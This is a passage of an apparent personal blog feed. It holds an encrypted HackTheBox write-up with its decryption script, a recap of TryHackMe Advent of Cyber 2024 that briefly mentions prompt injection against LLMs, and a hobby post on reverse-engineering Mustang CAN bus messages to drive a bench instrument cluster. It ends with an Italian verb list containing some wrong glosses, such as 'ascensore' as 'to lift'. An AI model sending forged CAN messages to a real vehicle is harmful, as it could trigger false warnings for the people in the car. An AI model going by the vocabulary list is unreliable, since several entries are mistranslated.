IWp+VQrrMWrK8N5d4GbHgwxU2uAHffQaj/OFunQttxLoENBwdxwBdSPRs/3vTr5Q97/SODXJ12Af046ItZ+Ca0TSI3KTLEK/F42CbsbAd44Wcj2uA20rqobcJkUcTqDSc088TnDKzCyHpHPOhmdPZoSI1gaoiCFpE0vCUXlWi7oNW9HrhVMNmvqv0yl04QDcHg4gXYenpgi2/pyDWZr+hxkYWbVtxCTT8Pwr7swFV6PWGSlSGM5U36qwPZ/26SfHxHWqAHbFRlJErAtcTy/+WO6XAtTEo5mfSudZVXpJeOpfWuotG4oft+ppkC32+eddtuG7LVq5p9Vbt5CMNYTGy39+FE4ffqUd2+CJa16lDmGvwFvMD3cyOC2zDmf7aqko5OYWUY1LbOvZI/OTioThkaMmeuEIh+lXshq09/oNImbKWPSJyI/2ztx2/rECH+DP0e3sh+1x5YP/270/UEx1gw6ERw5wZLiEughK1nBlGB9xhtffy/EzD/PIPJrixpF80l9GrtHV26BJ6xiMOfDapWFYv+cKbZwJ/E6Tt5IK3kkJVQN+qi4yr/f6lOTnmUNeIMmF/J4/fqXUWYeu/M+LFP4CPpRif0CFvfSTx9ag/25EPnFtls9jwG2eqPEhOmpYP5kh6rjXKjQGxBBAnxsO0AzZ+O8Nm1YxLgaLbu7zGCUJr/32XPQBOBHNlOy9PnmtroFJAbyzRtT4w7CVJRGIOv0tpQ8ye+duRnewPjqcKUqziH1OVOP44r9j3w5g0CVvIbY/bLfQt4yZiYRfKkB3aNH0Rguw3urEuB4V3splM+k75rkyXQ7ybt0iIsVvI8TAu6IgKmiEknJP7rIihC2mlWqwjo5JnZPZ6AlHmo7r3ue6KsRhZp2gy97jI5Ztpi72XCL3+p3R9MnS36eVQCIOFXHUAVbsvhK2jtOe63ZDvvbmd2LTxvFwjqrN5q1cZnfERsclgihCjhwbGoe+zpEqAzTergddObdL9EZ+PVxyO0Ah4v0TJVG9bVQ+QoexiIkyoyXkFhsh8VcEf7UQdHPOAxI+LOgztepqXf9T9VrYZhasiUhawingKnpg0iuf054D+QlkeWQ2rzX5JnR9VZRx08enFRbd6FSC3GWfC/fBEWDvI3wkF2f1FqM03pAcsHShz2mK/pnLQW6B46aiV1ZimIoY5eydHdPsACh1UeRBrYz/2GBAiF+lUGuZ9rG/LkL+V9dgBtVMp2rWXhlHzfms2XWLnOUjLCYr5yUXXKBWmUJ9Kj649YzyI1p9dhFnR75Ze2vISWQJ5jKtC/CDSQi/yU41MDOQhZBTUhj2OurZ4WP6mqr5pStsAPNBsMvaQAYksDvJYUZ6UodKlio/pYGI1D5LsWlN15jYbzPvb5ok9IqeO36zcvU0/rooU1yq04YBntVpXOjSzSynxO4oSvjkJGCCd2ElBy2ywT6zYAYm9IKCTP2vpDjO8IvpFLVJ6rhy4L7hLN3n3KV0jT2GoyUweBBMLjRVBaJK1yKFypbuqs18dcYW55p4+kOwLxRU21aRx9gQNZYA2cIDEPGzHW47mtwSrm18tM/Fvc1MHot2upLtYw08rR2ErQI1MahlBv4rLHMHjt70dWWsuBXYBdKpu8a8pSmhclWCxdmQ6+Svvw1s6Q3Zd6j7p++BHIUGAuR9z+EwIhm6hSAX1lLxOaLZivsfruL5f/4E97we4ccHETMOPvnq32zTcdfgLRINBfMQkuYDYd1JwOUAA0JM3BlZvw+FW5jqlQziCsIo80lCJRx6Q4OE0cWBEvk/OTgPfVbnKtOb+G7SLCUODwMH8fOV+Hzkae6J2AugPUX2X8fGm+GrpCqhs0jNI9r+r0ExL1Nf1MWf/B3OaxkIQ12YbLKjP7NfJNA5E5CzDL3OmKx5O0lDEt1mAisLcsnOODoEJdgDapdY7YLHG3tn53xgUf9te/WcxXk24sZdZJICd5gGq8RlTFk5nNZK2aIgL/W5F9bMXrUmHORE9UZ8LHgeDt7PjiKBUQ4Q9J5jCvcWbN2fsfeBZtG8lv9qios6vqp2waTY388JDQwDXBS6SgP7pkKg/EiekRYqP+ZO4mLbDw7cujfA8Jj0xJWcP0HgnXfPSk0sJdotjo0aQ1Yzy2Wth1FLyTk0vJT1/CNBswhW1Acy8beV9dNmRR4zDoM6kVOKXTsdRAsNKeh9z+R/heI/Rbe3D2LpLbuGimUrCxw1V08Yya+c3tvDX1iQNba8s8ZkiRqj39JT0LgVzjG4kvAXvFUZ87BJ/nthjurL04DYw4qWee1TG/vbmGS+2TchuwiOucbbii1Wt5moqslnwEVsrsDYEXj48lTrnvxS2VqxD53LpMgk4v3eN3LkQUiZK3vybTqwvGawGN5BDBm4S9F4O7/PtRp45yTG+gdHoUgWkFU2LWrOPkFCrEY10APXY4huVp5Cc/gTYLPFQKlfBllf+HBJ/pe5L41wLtiGfqBQCpYcG6C4a+/+xogMo3WFwCFoeUz3w1DCIyv2UIh1FqK5+Ia6Mvw3fJBFWSOCNWHBx0AKQ3UtApbZPVXofqQoOVbsSEpWcynVkKVjxZXLmMbv7bhM2ECtH/e2OjMGBUZv4UaPsWFaOiHOesW58je3tWi/boIhiTDLrMbGsqzDXPwrMLbSk4SR1zeLlt2idDVcA7YxazeHY+KKrWW539mzIHfU99zRKFJR7+NOMtRy0i+RB/oORkVIFCW83lDbW2n4WLbR7o2kwkk03BDT0boriSdaCQnDSUxKtEIxW3przHfjIOojgqJ2QQOTle+ITi8EE2xnJ9OZLSxOMo/bNXvGr+M0ScSoID4RPHGqxvEEbKTs7r5SBjZtJkPpeelj8jInVaP+IM/7FXbhvzQadwAk/qaaYpUzc4TmO31FuAMBmjHGF9B16sV4oHz8ee9KiLPUmw5GJ5TRE9rQEcxhN7rWAx434FIG2Knu4RtjAdu9fE8oO8G8df96+wYN2pdnqAjLN3zNqP6jX2TlewMDUh66LAHUIcjK9vgiypEtvk5T+1I3eeULx5oPUHf9G9llzQ/d+ih/smwGGFsLBoDsDgbxucrlaoqphrpa6/iwDFy+tms44OodzOA1CpG501GJ+4b7+KEY6qAX5tl6AKB8/UR9wVqlwNo83PeAPYqdQouUx4Sz26UJQep8WA0ANjM47xvr1BsnqdBqCe/4wJLWlFnQoqoNxBo3M35aZUOjLZY6j1QZi9cZtgQ+laK0TDgeJHJb2ov1QjzL+YRXwATLfiyi7SZCwuLaQHw4KYBo0BoJb4PPAqCTHDE4/4XOkr/CdypENZm9GEoTBdNJjwKz4rulON0IMJBPTwIMONsSXHa+zue3kiz6yD7EyZi2qvx3xuhE+S/zbPuczCoKWZ8SJi1Ktrhz9I9X7CyzoWo7ck2MCdJF8lIZ5Yjx+jd7arbrvJAC0aj0vSV1qtRGh2OT8FPrP0KPFdixV11bTwuyxupncP4ktH7UJ7rrV23BguDpRoj/R4MYTlHG10j0Q9TqPZUAR7hRhdPOLboJPliwFhuTdw1qoMerrBth6xwxTm+XrKY6zduuqyTmnAEHNa/Irm4MAbufvldsphzyo04aV97LgPRQmdCnuRU7KEHjpZEoXVAeM03/21HbkmkQ5orfrJH835mrn1yqxUI4z57w/NJllTcJAcWtxg5KjVM6fk4apYWjZ+Z45ilIqavY+nEdXTFKiOb6gNdrT6CCj3sMkE1DXeFVQhFPbKa9vOKe6+eo2PHT6eI4CzHYASX1bRHDzCHhfz6D9EmchozNsCunPwY2kLI9FXCK0GQJbO3X5UsajOh+WrXMcY/OEPVdppDyHsnlNPK0gbcuMlk5iOm7stb8s4QKRyPsft6LRAmF28/cQKa8NhHQ4xhX3R5USAGenmfO0SdWDRjwz/TrjXX8LdpN/RaSDRZgDw9e/DPhqagS4VkR3MYgC1OzrWHDWYeiYJDriBOCXZlMa3N2pFpOG3rpbjM19gG31L+gi+rjnxReqFOgnDaf90ql7FM7PXHn6xSyc4y4+yyqKBxBrGkPrEzPBXKu9401/aCfTdD7bPMOVbDFFM6fwqblUdCP1jRJQoibBp7vcrVOAya3SPOM0KAeYOGwMVhQ7qy1tSU9d/UTkzGNvJ7+RWm+Zsk/eyblz7uBhABIK2Fk8uyko0I2a7fA+z2fK7anVKendZCoY70IXmHvYB/bdPcZ/wi8omsAB4Iq5CRl2W/7GkOAbFJVKLQ/iHFLwAt97MqHavFE5wj/p0tW69M1hzDIX7zzBxYWF+sK4C/GGwU//V757yHJaB3Ad7XKmF8Vif/Nn2kgnAUR1OKYzXCRRkrIXi8Mcp7w7vdsQC1Qi6/xrEPEbQGkvAwwiPXymoEnPnQ6uTWoHmPqS9x7jIY8BbldGDbDKwkSavQUd2wEgprid17QQuPiNw5+fN1MWUwdVm/Pj3LtEPmPTGeG9zEtDjWREytw/+FyuidPSbWTeLY16m+tbqTOXo0BkJ9nyu1D8irfqakQtzNqorkkbDEqjiijbAUM+ehdHOtRSo6haRwaoMP/W1si8eqmxf+273P/wGBO5TOJPZJJb0TSvswSPO6+oBPE5C5P6ZasUWD6PC55cOs5Blt6Had91mXtu/Jt+kzzBqrljc/YhfJOT8Vpq/LVKBIlHM4QLgpKv3Y8U5qVyfodzlLVZwJRHC6kpq3F3iTAlx1FL4X7vxlxjGqioNCKiykhRux54lOZaPMcLh8ZAkvbw+RfMgFQ8x8wgXlluA5cM5ePfplk/ZXZFZK1JN/hwRGn0uqoPQf4DIjk1t8C1s2yFuqCWM4ZKedXQdMQEZG250uOvwuyJZVZCBHCG5mVPLmYqvrZfK+jNd4ZjZfisIphFLc9Fc3hycj/ZHYwZ7Na/MfHB3vJoipw4g9eCzouHcp/0KKHO6n6DtwiyQdZoggG1PkOl+qS/6RutDlmpLZ9595IA5awsDp68cvnHoYZz4lbcemsoKyOPXXpKYL3cdTZBMx3bdDbch/I+p3DoPKl/QWHtwOqJUTqqrmjDWQUxfLPIUaW9Y2f/goAqonYBokTTNNttB3Up8wjxrLySuScBU/1CNJhiwI0aPHQ1E1HOzMKanbFlu4wiZhJIvkc8EQyjU+1zz2Paje4nIA00zG3sZk07E0SWhOk8roDOfFlK1GOWVFn72NZ/EK/AI5ZMwys+Ym/JNYWC+9xZIEPQMRGsMxpxcI1itEZ2jz+74KD3ptkBjPdbqZ2bKOs/Wo4hBmkNQDd1MPk1WAMbCfnnHFJ5hzlnsKQPTouX/yzNLvk2vCEQT2+dNGo53nric6wLD+xbzXwCjYRgh7QDSjMFAqGT9PYhHhqfBd0QfdfIWQPEbwJuUfPxsJdx/eoIaqOUy+40KoAT8dvyF3evDjR6GFPhk9iqZmcHU4dZSEWEfp4S0/Qf0jjiM6RtFw8JfXIvVFPjUikszYYppY18E5yNrSGKlsQjva9DokQVgUmcO3F7pYcXDmtU99OHEGahvMMjBpWNsRQutJfRM7NPSqYTo68jjKkL5t2rpfFAxuajoRFGASF9aK/fCO/yMqU44Mt6M1GJImM/Zqhc4EaVP2od7x2aP7T2hZva4MobAXsJMFkmu+wWilUrdaI+mYr8HHEQbUj4SlIqiya5KTUHdCpzRKPUJp6YrnhKGiXkh4smSU8d0IeCcQ0T58cVkpwIKudhWBuW4hEhnFbPMk/4e65D4lScG9EXOi9VmCgDinzmTR/saevYtfTGsuQ019pRlPOhW9wVu/n2tk/QgikTCQVG47vDlFaUm1L7nBJbOPkO+ZtEETW1esjrwYwGCaQxjUYNrRa2Y/Ydy2MDf3DLe6cgxNJRqBs91yJdVXK1T9mwohROt4gyxtykQqmmL/eZwYyplAR/FRIsUNyGR7H278ZBlR5DHpDW8MWxnlkjny2xFyYc9UM7Ah1CihNeiWTRDL+VQRA2Vyo9GU4j//pG8FQwCIxkrZBToghj2TCJvtlB8OiMx7S0B3ddtD2590I04N5aO/xlBvCBs1yEJsoevvf9XPc9nrFokSDvLsjgA1cFlrQiHl8LmkPawuQ2IbmPHQcegnIleDIJfNTqcsSuMwqHhjXRvuzF+fTUl4PcWs9AjBm1kC/TpCb+sveph2YZ/2yLZBqsuL+CBQQpsoL0GkoDeDzxWmuVmGOkM+M3gCO9aH9Jmx6zRpgWVbnVnulcVZkF47fcqVZOwVgYcxbs8QD0hzTnEaJJ689ER4xuhgP5gdi7+jGodPU9CUg4TdTVHQfhDPj7XtQKQIaaAEaKI5L7Nq27MNd23EmWkYFUcJCxJoQbMmBLTBXqN9VZX3DR9TRtZBjDfjGzNyPRLy1kjDUTr6Xecu5aHhhXYqyAYqxzPPP18w/v+jHEz7gja2waMh6tAPAigGI4n10NoicFFppSrtAnizA70uSJFF4M5L+UM7ANXaaiCiDuHzGfwmIhv7UK8UorJ5NZo3Iom9XQCxVjE8xHVEJDqjHUj10oK5rP8Bbm0lXuPhl9D6VyJWMkKquVxFam38h8kvtnxivBWUsXel+XglRIpCUuKDsJlLj4Gp202ods99Rm64bDUGFF7ukQDsLEOwTJN3UHvSD86IltfBSwZCj0xgd0++hI+VtRXlZ16q3l1WmcOdBb81Ul43W7b/2WE/Y5vt/jNIjLyCxRSxxdKgsuug7OFqd9cLboRQZiw93tlROqZMvQpf676R79B4mLzLwOHGhkW24PGkvuNFj3mMlTlv/90VUawhPB0IPv+8uoVB3kBoh1QrvR2ZAQWJxbED6i1F/Pi2UlMPxN0QBRIxwy/GpKw/2CdEugbu2cVrZgm3QXaau+h+HdsxPxWySvyVEn6VpgW9+lMM8nXxpFw7iqZKmgQoFyNblOjoLfU4DMZeJGqqlOlgLCS9cKa3Kq8CvRdltvR93zhH5Ui0lXLQjQwKJ2+BsdSetRbrWJkceJar+PX/TQooyJGWKtQlimmjcxjB3t6ogMB8y0+ycJMi7wCJ4hikeEIyjQjKQ3zn12tdzLEd7rfE3l9XBiPJsrKUxtZ7nTNA6+15+HKwf+Cr9I8lXKsXkJYD6j3jihWngUo9xPdoVc4h03uQrsA1PRvW7yOv4NO8k+lal9NfsZ1lTUEsUdYKaAMv+CDwjVekwSP193QHJa+SxuiTBhANlDnyZugJGk/zwBvw/fzASa0CUg/zQFRBdWadQlxiLmLhecupjw1Ib8xo2l1oa4DliAKo/ue/xT5eWU7+HahITYcp9saGO+4uFt+jYmZONqNpiZGvlfRmsoBNTxwr1tSdXQE3isO0K8cPI9ebdm4DG4H6ma3jr+C8uxrPEr9gvAL+44OFOtBqUhyG7mGHw4LpRaf+mLKIEGA2PkdYKSeJHt+j6QOR0q62q1YsggnvrSXdXrO4LI8hxEKf1gFn0+KqInw2F1svOORG6H+d9niMy1RnvdcpbFKDk+MSp6W70DbeOswgVOqLjKDAcVYiVArwcDT5ooMy2I4nizBfk/tuFAYX+R+9bpM4dsYRslrB6c4UrtyvVQVZfEkKBVqWW1D6MH5XwAhEtLC2YGvupe4e/ZxlWNiH8RDPNX/QjhgbFc3qTURVKa40Dg4xp2ibI4ZiTHrKTX4Jw5KBHB0MrVSsDmsR8qubGmZQH0OIOG2cTeieaUCLOTJRH/xmv5UD/KpadvWh8pocmwk7HbJ7EeZIANaLLmoGFb1SzHDi80moGh49lUctCVu0nW3Wys2v3zHevX/42G7sd9qTFHcVdrdMI2SMnFOLd10NGtXFFvk1yyVJT4Usvj5b+quAMnB9x0lhylZxUXxkD3JTneaNPNY03cEBYw5kQiHQ8BuBT/i2sz/za/Kd+sxkx0Ek4FXgAruAWreTQO1LeeWFhU1A5f2gclr4EMCulSS2dDxiSwBn3nOnoY8SGpzZHYpENWbl4UvSU49SWGYJDcSRnMBXhz8+Eh/ojgw0TEuHxmGygUPk7tvCoJgu/S1s4MW4bWq0Won3e1fJLqUMgTqE3SiJJM0Vo5INcLUgy7U6wndbZljECYqLoHPL2HV8AX1uWsgjCRKq99x6658w9y2BRd8sAcB10Z9ZJDxJcakSo2aGMvCsveT2m9kXPXXT+oFjJXX4zkovWOXWnUj60QGX3CZmH3PJct2mjfqzSPOaegywZJFNNsBG4FPGj3e08dSXN09RA/trdfhMwWuL8yHrA8pFGKhkFCinuKVspo6V3uEFeQ36b3Ik6NLwl+A+2cPixtL0nI/bxMn914OZC3BpTJJl222rSUfY1PIbRce4/fPP6bW6vlPVuynJoMveeUUPJnGHaZwg92qUbu/apK9GKohmCMl+rAd2Amlj6fUlR/xbVQm85i5KrHgNeujxu9jYGNaubzhYfESHvVgxGlilyceMauYKuz1G+/ntZxsAtyF3xGeqj9+WbVVwTID5gcmlbL/rFbBKre0D+dqR7cnDRUOCvFOP4m14i7IbptMhpedP7EcHtTCUCNCE3j58OMimpSwtxvGs/pM3v3Y08ZnoHhwPvqQxhSDcOXq+5scFPYB1PMesS+8HHo4y9NpPecSHRuFxCt0vpYCO3iaI/Udu9gJHjZo0pI/3oeWpX6NZUufAYFALR0qOzCvd0mHyHkQ98baeC39NQEAr4DyD2E16L+uB9zREQT0ZckFHvqjs51/AkGibbPpGNt+xGvmxQVTd56Kn2WVXKh3mb1aQ1u/KA3d/UkPTlaYsktP7UG6esZG4gqdt4UZ9YWtjM44yg6U6k=;^</div> <div id="pec-decrypted-content"> <h4><i>This challenge is currently active on HackTheBox, thus is required to be password protected. You will need to wait until the challenge is retired for the full solution. In special circumstances, you may email me for the password.</i></h4> </div> <form id="pec-decrypt-form"> <label for="pec-content-password">Password</label> <input type="password" id="pec-content-password" placeholder="Password" /> <button type="button" id="pec-decrypt-content">Decrypt</button> </form> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/enc-base64.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/cipher-core.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/pad-nopadding.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/md5.js"></script> <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/components/aes.js"></script> <script type="text/javascript"> (function(){var a=function(b,c){for(var d=b.length;d>0;d--)if(b[d-1]!==c)return b.slice(0,d)},e=function(b,c,d,f){var g=CryptoJS.MD5(b),h=CryptoJS.enc.Base64.parse(c),i=CryptoJS.enc.Base64.parse(d),j={key:g,iv:h,ciphertext:i},k=CryptoJS.AES.decrypt(j,g,{iv:h,padding:CryptoJS.pad.NoPadding});try{return a(k.toString(CryptoJS.enc.Utf8),f)}catch(l){return!1}};document.addEventListener('DOMContentLoaded',function(){var b=document.getElementById('pec-decrypt-content'),c=document.getElementById('pec-content-password'),d=document.getElementById('pec-encrypted-content'),f=document.getElementById('pec-decrypted-content'),g=document.getElementById('pec-decrypt-form'),h=function(a){var h=d.innerHTML.split(';'),i=e(c.value,h[0],h[1],h[2]);i?(f.innerHTML=i,g.parentNode.removeChild(g),d.parentNode.removeChild(d)):(c.value=''),a.preventDefault();return!1};b.addEventListener('click',h);g.addEventListener('submit',h)})})(); </script>2024-12-25T00:20:44-05:002024-12-25T00:20:44-05:00Eric Turnertag:blog.ericturner.it,2024-12-25:/2024/12/25/tryhackme-advent-of-cyber-2024/

<p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image.webp"/></p> <p>I've spent the past few weeks tackling <a href="https://tryhackme.com/r/room/adventofcyber2024">TryHackMe's Advent of Cyber 2024</a>.</p> <p>Some of my favorite challenges were:</p> <ul> <li>Day 1 OPSEC, searching online to try and find similar strings via GitHub to link back to the attacker</li> <li>Day 7 AWS Log Analysis, I'm not super versed in cloud security, this …</li></ul>

<p><img alt="" src="https://blog.ericturner.it/uploads/2024/12/image.webp"/></p> <p>I've spent the past few weeks tackling <a href="https://tryhackme.com/r/room/adventofcyber2024">TryHackMe's Advent of Cyber 2024</a>.</p> <p>Some of my favorite challenges were:</p> <ul> <li>Day 1 OPSEC, searching online to try and find similar strings via GitHub to link back to the attacker</li> <li>Day 7 AWS Log Analysis, I'm not super versed in cloud security, this was helpful information on log review for AWS</li> <li>Day 16 Azure, same with above, more info into Azure CLI</li> <li>Day 18 Prompt injection, AI has secured a foothold in our present and future. Finding ways to break LLMs for malicious purposes will constantly be looming, and with each evolution, it will get better at generating code and could create a completely autonomous way to generate malware and setup infrastructure</li> <li>Day 19 Game Hacking, I have not heard of Frida before but was a fan of it. I have used burp proxies to intercept mobile traffic for mobile game hacking and also cheat engine for pc game hacking. This was another welcome addition to the toolkit.</li> <li>Day 21 Reverse Engineering, Malware Analysis and Reverse Engineering is a true passion of mine and I enjoyed this room</li> <li>Day 24 Communication protocols, Intercepting a new protocol to determine how to intercept and forge our own traffic was neat. I have done similar things with CANBus traffic in vehicles.</li> </ul> <p>This was a pretty well-balanced room that covered a number of red team, blue team and purple team topics and I had a lot of fun with it!</p>2024-02-04T14:50:50-05:002024-02-04T14:50:50-05:00Eric Turnertag:blog.ericturner.it,2024-02-04:/2024/02/04/s550-mustang-ipc-reverse-engineering/

<p>Note: This post was published 4 Feb 2024, but was based off of research and work completed back in May 2023.</p> <h1 id="introduction-video-walkthrough">Introduction &amp; Video Walkthrough</h1> <p>https://www.youtube.com/watch?v=OzUs28GIq0A</p> <p>Back in 2020, I removed the analog instrument cluster from my 2015 Mustang GT Premium to upgrade it to …</p>

<p>Note: This post was published 4 Feb 2024, but was based off of research and work completed back in May 2023.</p> <h1 id="introduction-video-walkthrough">Introduction &amp; Video Walkthrough</h1> <p>https://www.youtube.com/watch?v=OzUs28GIq0A</p> <p>Back in 2020, I removed the analog instrument cluster from my 2015 Mustang GT Premium to upgrade it to a 2018 Digital Cluster (see here for more info on that: <a href="https://blog.ericturner.local/2020/08/26/2018-mustang-technology-retrofit/">2018+ Mustang Technology Retrofit &ndash; { Eric's Blog } (ericturner.it)</a>). I kept the old cluster laying around, no idea what I wanted to do with it.</p> <p>Fast forward to 2023, I had just recently purchased a 2016 Mustang GT350. I used a usb to OBD reader and performed some CANbus data logging while I interacted with buttons in the car multiple times in a row (turn signals, brights, arrow keys on the steering wheel, opening the doors). Then went for a short drive while data logging.</p> <h1 id="reversing-canbus-data-log">Reversing CANBus Data Log</h1> <p>With the data saved to files, and the cluster hooked up and ready for interface with my computer, I wrote some <a href="https://github.com/EricTurner3/s550-canbus/blob/master/replay.py">python code so I could replay my saved files</a> in real time and monitor the console output whenever I saw lights or messages appear on the cluster. Through hours of brute-force trial and error, I was able to get a lot of information to be able to reproduce. Here was an example of how just one message ID can display a bunch of different information just from a few byte changes: </p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/02/image-2.webp"/></p> <p>I could then hook up python code with some IF statements to map exactly what bytes would be sent for different lights or messages. Example excerpt below from the main <a href="https://github.com/EricTurner3/s550-canbus/blob/master/s550_cluster.py">s550_cluster.py</a> file.</p> <div class="highlight"><pre><span></span><code><span class="k">def</span><span class="w"> </span><span class="nf">send_misc_2</span><span class="p">(</span><span class="n">clusterdata</span><span class="p">):</span> <span class="w"> </span><span class="sd">'''</span> <span class="sd"> ABS, Traction Control Off, Traction Control Loss Icons, Airbag</span> <span class="sd"> Byte 1 - </span> <span class="sd"> 0x2_ - Check Brake System warning</span> <span class="sd"> 0x4_ - AdvanceTrac System Warning</span> <span class="sd"> Byte 5 has to do with a solid traction control or a flashing icon</span> <span class="sd"> 0x00 - Off</span> <span class="sd"> 0x02 - Solid</span> <span class="sd"> 0x0F - Flashing</span> <span class="sd"> Byte 6 -</span> <span class="sd"> 0x0_ - ABS light off</span> <span class="sd"> 0x4_ - ABS Solid</span> <span class="sd"> 0x8_ - ABS Flash Slow</span> <span class="sd"> 0xD_ - ABS Flash Fast</span> <span class="sd"> '''</span> <span class="k">if</span><span class="p">(</span><span class="n">clusterdata</span><span class="o">.</span><span class="n">icon_traction_control</span> <span class="o">==</span> <span class="mi">2</span><span class="p">):</span> <span class="n">traction_control</span> <span class="o">=</span> <span class="mh">0x0F</span> <span class="c1"># flashing</span> <span class="k">elif</span><span class="p">(</span><span class="n">clusterdata</span><span class="o">.</span><span class="n">icon_traction_control</span> <span class="o">==</span> <span class="mi">1</span><span class="p">):</span> <span class="n">traction_control</span> <span class="o">=</span> <span class="mh">0x02</span> <span class="c1"># solid on</span> <span class="k">else</span><span class="p">:</span> <span class="n">traction_control</span> <span class="o">=</span> <span class="mh">0x00</span> <span class="c1"># off</span> <span class="k">if</span><span class="p">(</span><span class="n">clusterdata</span><span class="o">.</span><span class="n">icon_abs</span> <span class="o">==</span> <span class="mi">2</span><span class="p">):</span> <span class="n">abs_icon</span> <span class="o">=</span> <span class="mh">0xD0</span> <span class="c1"># flashing</span> <span class="k">elif</span><span class="p">(</span><span class="n">clusterdata</span><span class="o">.</span><span class="n">icon_abs</span> <span class="o">==</span> <span class="mi">1</span><span class="p">):</span> <span class="n">abs_icon</span> <span class="o">=</span> <span class="mh">0x40</span> <span class="c1"># solid on</span> <span class="k">else</span><span class="p">:</span> <span class="n">abs_icon</span> <span class="o">=</span> <span class="mh">0x00</span> <span class="c1"># off</span> <span class="n">data</span> <span class="o">=</span> <span class="p">[</span><span class="mi">00</span><span class="p">,</span> <span class="mi">00</span><span class="p">,</span> <span class="mi">00</span><span class="p">,</span> <span class="mi">00</span><span class="p">,</span> <span class="mi">00</span><span class="p">,</span> <span class="n">traction_control</span><span class="p">,</span> <span class="n">abs_icon</span><span class="p">,</span> <span class="mi">00</span><span class="p">]</span> <span class="k">return</span> <span class="n">send_msg</span><span class="p">(</span><span class="n">MISC_2</span><span class="p">,</span> <span class="n">start</span><span class="p">,</span> <span class="n">data</span><span class="p">)</span> </code></pre></div> <h1 id="wiring">Wiring</h1> <p>With some functionality discovered, the old instrument cluster can be wired up for power and can messages to send the decoded messages from my computer to the cluster.</p> <p>I had a subscription to Ford's Service Manual &amp; Wiring Diagrams from awhile back so I already had the pin out to the connector on the back of the cluster</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/02/image.webp"/></p> <p>Pin out for the connector on the back</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2024/02/image-1.webp"/></p> <p>Wiring for Power, Ground and CANbus functions</p> <p><img alt="" src="https://user-images.githubusercontent.com/5173637/236826213-f898a93a-f348-4331-aae2-c1d1495cb0d0.jpeg"/></p> <p>Power went into a 5.5mm x 2.1mm 12V power connector. CANbus cables went into a USB-TO-CAN adapter I had from Canable.</p> <h1 id="what-works">What Works</h1> <p>All of the below indicators can be modified by game data, such as telemetry out from Euro Truck Simulator 2 or Forza Horizon 5 and re-mapped into the cluster for display</p> <ul> <li>Turn Signal Indicator</li> <li>High Beam / Headlight Indicator</li> <li>Seatbelt Indicator / Chime</li> <li>Airbag Indicator</li> <li>Parking Brake Indicator</li> <li>ABS Indicator</li> <li>Traction Control Indicator</li> <li>Hill Start Assist Warning Message (Suppressed)</li> <li>Launch Control Indicator</li> <li>Door Ajar Indicator / Warning</li> <li>Speedometer</li> <li>RPM</li> <li>Engine Temp / Overheat Warning</li> <li>Cluster Navigation (Arrow Keys + Enter key to interact with the on screen display)</li> </ul> <h1 id="future-enhancements">Future Enhancements</h1> <p>At the time of writing in Feb 2024, I no longer have a mustang so data logging to find further functionality is not available to me. Things I would love to have work though:</p> <ul> <li>Check Engine Indicator</li> <li>Control Fuel Gauge (would require use of pins 9 &amp; 10 on cluster)</li> <li>TPMS Indicator</li> <li>Fix the plethora of warnings when the cluster boots up<ul> <li>Blind Spot Assist Not available</li> <li>Low Engine Oil pressure</li> <li>Steering Assist Fault Service Required</li> <li>Cross Traffic System Fault</li> <li>Fuel Level Low</li> <li>See Manual</li> <li>Door Ajar</li> <li>Tire Pressure Monitor Fault</li> </ul> </li> <li>Gauges<ul> <li>Air/Fuel Ratio</li> <li>Boost/Vaccuum</li> <li>Oil Pressure</li> <li>Inlet Air Temp</li> <li>Miles to E</li> </ul> </li> <li>Odometer</li> </ul> <p>If any one else has a mustang and can perform data-logging or reverse engineering, feel free to make pull requests to my github with more functionality!<br/> <a href="https://github.com/EricTurner3/s550-canbus/issues">Issues &middot; EricTurner3/s550-canbus &middot; GitHub</a></p>2023-04-20T21:24:53-04:002023-04-20T21:24:53-04:00Eric Turnertag:blog.ericturner.it,2023-04-20:/2023/04/20/top-200-verbs-in-italian/

<p>Ecco l'elenco dei 200 verbi pi&ugrave; importanti in italiano.</p> <p>italiano</p> <p>English</p> <p>abitare &nbsp;</p> <p>to live in</p> <p>abituarsi &nbsp;</p> <p>to get used to</p> <p>accadere</p> <p>to happen</p> <p>accendere</p> <p>to turn on / switch on</p> <p>acquista</p> <p>to buy</p> <p>affittare</p> <p>to rent out</p> <p>aiutare &nbsp;</p> <p>to help</p> <p>amare &nbsp;</p> <p>to love</p> <p>andare &nbsp;</p> <p>to go</p> <p>apparire</p> <p>to appear</p> <p>appartenere a …</p>

<p>Ecco l'elenco dei 200 verbi pi&ugrave; importanti in italiano.</p> <p>italiano</p> <p>English</p> <p>abitare &nbsp;</p> <p>to live in</p> <p>abituarsi &nbsp;</p> <p>to get used to</p> <p>accadere</p> <p>to happen</p> <p>accendere</p> <p>to turn on / switch on</p> <p>acquista</p> <p>to buy</p> <p>affittare</p> <p>to rent out</p> <p>aiutare &nbsp;</p> <p>to help</p> <p>amare &nbsp;</p> <p>to love</p> <p>andare &nbsp;</p> <p>to go</p> <p>apparire</p> <p>to appear</p> <p>appartenere a</p> <p>to belong</p> <p>appellarsi</p> <p>to appeal</p> <p>appendere</p> <p>to hang</p> <p>aprire</p> <p>to open</p> <p>arrivare</p> <p>to arrive</p> <p>ascensore</p> <p>to lift</p> <p>ascoltare &nbsp;</p> <p>to listen</p> <p>aspettare &nbsp;</p> <p>to wait</p> <p>assaggiate</p> <p>to taste</p> <p>attirare</p> <p>to attract</p> <p>augurare</p> <p>to wish</p> <p>avere</p> <p>to have</p> <p>baciare</p> <p>to kiss</p> <p>battere</p> <p>to beat</p> <p>bere &nbsp;</p> <p>to drink</p> <p>bisognare</p> <p>to need</p> <p>cadere</p> <p>to fall</p> <p>calcolare</p> <p>to reckon</p> <p>cambiare &nbsp;</p> <p>to change</p> <p>camminare &nbsp;</p> <p>to walk</p> <p>cancellare</p> <p>to delete</p> <p>cantare</p> <p>to sing</p> <p>capire</p> 